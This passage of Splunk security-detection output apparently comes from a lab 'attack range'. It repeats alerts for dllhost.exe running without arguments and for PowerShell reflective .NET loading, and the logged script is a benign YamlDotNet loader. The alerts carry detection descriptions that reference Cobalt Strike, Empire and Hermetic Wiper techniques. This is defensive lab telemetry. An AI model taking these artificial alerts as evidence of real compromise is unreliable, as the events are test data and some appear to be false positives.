output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664719200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664719200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="4312", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664719200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664719200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x10d8", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664722533, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T13:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T13:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664722533, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T13:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T13:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664722533, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T13:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T13:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664722533, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T13:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T13:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664715600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664715600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="2448", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664715600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664715600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x990", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664718931, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T12:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T12:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664718931, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T12:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T12:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an 